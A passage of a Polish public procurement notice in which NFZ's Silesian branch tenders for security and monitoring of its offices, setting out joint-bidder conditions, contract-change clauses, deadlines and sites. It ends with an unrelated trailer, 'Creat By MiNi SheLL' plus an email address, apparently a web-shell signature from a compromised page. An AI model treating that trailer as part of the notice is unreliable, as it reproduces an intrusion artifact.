ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust.1 pzp , składa każdy z Wykonawców, odrębnie we własnym imieniu. Oświadczenia te potwierdzają brak podstaw wykluczenia z postępowania oraz potwierdzenie spełniania warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	warunek udziału w postępowaniu, o którym mowa w Rozdziale XIV ust.1 pkt 2 SWZ – winien spełnić każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w zakresie wykonywanych przez siebie usług, co do realizacji których SWZ wymaga posiadania koncesji;<br/>b)	warunek udziału w postępowaniu, o którym mowa w Rozdziale XIV ust.1 pkt 3 lit.a SWZ – wystarczy spełnienie go wspólnie przez Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienie (jako suma posiadanych środków finansowych lub zdolności kredytowej), co oznacza, iż warunek może spełnić jeden z Wykonawców, łącznie dwóch lub kilku z nich albo łącznie wszyscy Wykonawcy;<br/>c)	warunek udziału w postępowaniu, o którym mowa w Rozdziale XIV ust.1 pkt 3 lit.b SWZ – winien spełnić samodzielnie przynajmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tzn. przynajmniej jeden z takich Wykonawców powinien posiadać wymagane ubezpieczenie od odpowiedzialności cywilnej (brak możliwości sumowania polis OC);<br/>d)	warunek udziału w postępowaniu, o którym mowa w Rozdziale XIV ust.1 pkt 4 lit.a SWZ – wystarczy spełnienie go wspólnie przez Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienie (jako suma zdolności technicznej – samochodów), co oznacza, <br/>iż warunek może spełnić jeden z Wykonawców, łącznie dwóch lub kilku z nich albo łącznie wszyscy Wykonawcy;<br/>e)	warunek udziału w postępowaniu, o którym mowa w Rozdziale XIV ust. 1 pkt 4 lit.b SWZ - winien spełnić samodzielnie przynajmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tzn. przynajmniej jeden z takich Wykonawców powinien posiadać wymagane doświadczenie (brak możliwości sumowania zdolności zawodowej - doświadczenia). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający zastrzega sobie prawo zmiany miejsca (adresu) chronionego obiektu w ramach tej samej miejscowości, z zachowaniem tej samej liczby pracowników ochrony fizycznej na poszczególnych zmianach oraz z zachowaniem tej samej zasady podziału zmian, chyba, że wystąpią okoliczności uzasadniające wyłączenie przewidziane w ust. 3 niniejszego paragrafu - w takim przypadku zastosowanie znajdą zasady określone w ust. 3. Zamawiający poinformuje Wykonawcę za pośrednictwem poczty elektronicznej na adres e-mail: ……… o zamiarze zmiany miejsca (adresu) obiektu ze wskazaniem terminu, od którego zmiana winna obowiązywać. Zamawiający jest zobligowany poinformować o niniejszym na co najmniej 30 dni przed wskazanym terminem. Zmiana zostanie potwierdzona przez Strony pisemnym aneksem do umowy. <br/>2. W toku realizacji umowy Wykonawca może dokonać zmiany podwykonawcy, bądź zrezygnować z podwykonawcy wskazanego w ofercie Wykonawcy złożonej w zamówieniu nr 13/us/2025. Zmiana, bądź rezygnacja winna nastąpić w drodze pisemnego aneksu do umowy z podaniem przyczyny zmiany, bądź rezygnacji oraz w przypadku zmiany – ze wskazaniem nowego podwykonawcy (jeżeli dotyczy). W sytuacji niewskazania podwykonawstwa w ww. ofercie, Wykonawca może dokonać wskazania podwykonawcy na etapie realizacji umowy, przy uwzględnieniu warunków określonych dla podwykonawstwa w zamówieniu nr 13/us/2025.<br/>3. Zasady wprowadzenia zmian wysokości wynagrodzenia przewiduje § 2b projektowanych postanowień umowy.	<br/>4. W przypadku ustawowej zmiany stawki podatku VAT w okresie realizacji niniejszej umowy, do cen netto wskazanych w załączniku nr 1, zostanie doliczona stawka podatku VAT obowiązującą na skutek wprowadzonej zmiany. Jeżeli zmiana stawki podatku VAT będzie oznaczała zwiększenie wynagrodzenia całkowitego brutto umowy albo - w sytuacji, gdy podatek VAT zgodnie z obowiązującymi przepisami obowiązany będzie odprowadzać Zamawiający - zwiększenie wydatku brutto po stronie Zamawiającego, Zamawiający zastrzega sobie prawo skrócenia terminu realizacji umowy w przypadku nie posiadania stosownego zabezpieczenia w środkach finansowych. W takiej sytuacji termin realizacji umowy zakończy się z dniem, w którym suma poniesionych przez Zamawiającego wydatków brutto osiągnie lub zbliży się do wysokości ceny oferty netto Wykonawcy powiększonej o podatek VAT w wysokości obowiązującej w dniu złożenia oferty w zamówieniu nr 13/us/2025. Zmiana stawki podatku VAT wraz z konsekwencjami w postaci zmiany wynagrodzenia lub skrócenia terminu realizacji umowy zostanie wprowadzona do umowy w formie pisemnej, <br/>w drodze aneksu do umowy, ze wskazaniem dnia wejścia w życie zmiany stawki podatku VAT. <br/>5. W trakcie realizacji umowy Wykonawca może dokonać zmiany formy zabezpieczenia na jedną lub kilka form, o których mowa w art. 451 ust. 1 ustawy Prawo zamówień publicznych. Zmiana formy zabezpieczenia musi zostać dokonana z zachowaniem ciągłości zabezpieczenia i bez zmniejszania jego wysokości. O zamiarze dokonania zmiany formy zabezpieczenia Wykonawca obowiązany jest poinformować Zamawiającego z odpowiednim wyprzedzeniem. Zmiana formy zabezpieczenia zostanie potwierdzona stosownym aneksem do umowy.<br/>6. Zamawiający zastrzega sobie prawo wyłączenia z zakresu niniejszej umowy jednego lub kilku obiektów w sytuacji uzasadnionej potrzebami Zamawiającego. Wyłączenie może nastąpić również w mniejszym zakresie, w szczególności w stosunku do usług monitoringu świadczonych w danym obiekcie lub obiektach, bądź w stosunku do usług zabezpieczenia technicznego danego systemu świadczonych w danym obiekcie lub obiektach. Wyłączenie może mieć również charakter czasowy. Zasady wyłączenia szczegółowo określa §1 ust. 3 projektowanych postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://nfz-katowice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-16 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Termin wykonania zamówienia: w terminie od dnia 13.07.2025 r. godz.8.00 (rozpoczęcie) do dnia 13.07.2026 r. godz.8.00 (zakończenie).*<br/>* jeżeli zawarcie umowy nastąpi później niż dnia 13.07.2025 r., usługa będzie świadczona w okresie 12 miesięcy licząc od dnia zawarcia umowy. W takiej sytuacji świadczenie usługi pierwszego dnia rozpocznie się o godz. 8.00, natomiast ostatniego dnia zakończy się o godzinie 8.00. Ostatnim dniem obowiązywania umowy (do godz. 8.00) będzie dzień, który datą odpowiada dniowi zawarcia umowy. Zgodnie z regulacją art. 112 k.c., termin oznaczony <br/>w miesiącach kończy się z upływem dnia, który datą odpowiada początkowemu dniowi terminu, a gdyby takiego dnia w ostatnim miesiącu nie było - w ostatnim dniu tego miesiąca. <br/>2. Miejsce realizacji zamówienia: <br/>1)	Katowice, ul. Kossutha 13 - własność NFZ;<br/>2)	Rybnik, ul. 3 Maja 29 (Delegatura Śląskiego OW NFZ) - własność NFZ;<br/>3)	Częstochowa, ul. Czartoryskiego 28 (Delegatura Śląskiego OW NFZ) - własność NFZ;<br/>4)	Bielsko-Biała, ul. Karpacka 24 (Delegatura Śląskiego OW NFZ) - lokal wynajmowany;<br/>5)	Punkt obsługi klientów w Tychach, ul. Grota Roweckiego 42A - lokal wynajmowany;<br/>6)	Punkt obsługi klientów w Lublińcu, ul. Sobieskiego 9 - lokal wynajmowany;<br/>7)	Punkt obsługi klientów w Myszkowie, ul. Kościuszki 26 - lokal wynajmowany;;<br/>8)	Punkt obsługi klientów w Dąbrowie Górniczej, ul. Wyszyńskiego 1 - lokal wynajmowany.<br/>3. Wraz z ofertą (formularzem oferty) należy złożyć:<br/>1)	formularz kalkulacja cenowa; <br/>2)	formularz opis przedmiotu zamówienia;<br/>3)	formularz opis równoważności – jeżeli dotyczy<br/>4)	oświadczenie, o którym mowa w art. 125 ust. 1;<br/>5)	informację, o której mowa w art. 225 ust. 2 ustawy pzp;<br/>6)	oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które usługi wykonają poszczególni Wykonawcy - jeżeli dotyczy.<br/>7)	pełnomocnictwo – jeżeli dotyczy;<br/>4. Z postępowania o udzielenie zamówienia Zamawiający wykluczy Wykonawcę, który podlega wykluczeniu na podstawie art. 1 pkt. 3 w zw. z art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji <br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tj. Dz.U z 2025r. poz.514), zwana dalej UOBN<br/>5. Kwestie dotyczące klauzuli RODO reguluje SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com